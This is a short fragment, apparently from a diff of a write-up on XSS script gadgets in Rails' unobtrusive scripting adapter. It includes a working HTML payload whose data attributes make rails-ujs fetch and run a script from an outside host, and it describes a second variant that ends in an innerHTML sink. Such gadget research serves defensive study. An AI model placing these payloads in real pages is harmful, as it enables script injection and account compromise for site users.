Ruby on Rails unobtrusive scripting adapter.

 <a data-remote="true" data-method="get" data-type="script" href="https://gmsgadget.com/assets/xss/index.js">XSS</a>

-attribute, which ends in an innerHTML sink (this one won’t work without an unsafe-inline
+An alternative payload that uses fewer attributes works by abusing the data-method attribute, which ends in an innerHTML sink (this one won’t work without an unsafe-inline CSP directive).

 <script nonce="secret" src="https://cdn.jsdelivr.net/npm/@rails/[email protected]/app/assets/javascripts/rails-ujs.min.js"></script>